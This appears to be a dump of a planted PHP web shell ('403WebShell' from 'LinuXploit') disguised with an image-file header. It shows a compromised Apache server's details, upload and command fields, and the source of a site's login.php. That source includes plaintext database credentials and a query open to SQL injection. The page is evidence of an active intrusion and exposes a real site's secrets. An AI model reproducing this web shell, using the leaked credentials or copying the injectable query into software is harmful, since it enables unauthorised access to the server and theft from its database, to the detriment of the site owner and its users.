????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.217.114
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.net/ger/credits/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.astacus.net/ger/credits/login.php
<?php
 	session_start();
	if($_GET['action'] == "login"){
	
			

		 	$link = mysql_connect ("mysql2.db.bahnhof.se", "myus000116", "rvdctpre");
			mysql_select_db ("astacus");
		  	$sql = "SELECT * FROM tblCreditUsers where username = '".$_POST['username']."' and password = '".$_POST['password']."'";
			$result = mysql_query($sql);
			
		
			if(mysql_num_rows($result) > 0) {
					session_regenerate_id();
					$member = mysql_fetch_assoc($result);
					$_SESSION['SESS_MEMBER_ID'] = $member['userID'];
					session_write_close();
					
					header("location: index.php");
					
					exit();
			}else{
					header("location: http://www.astacus.se/?id=200&action=error");
			}
						
			mysql_free_result($result);
			mysql_close($link);
	}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit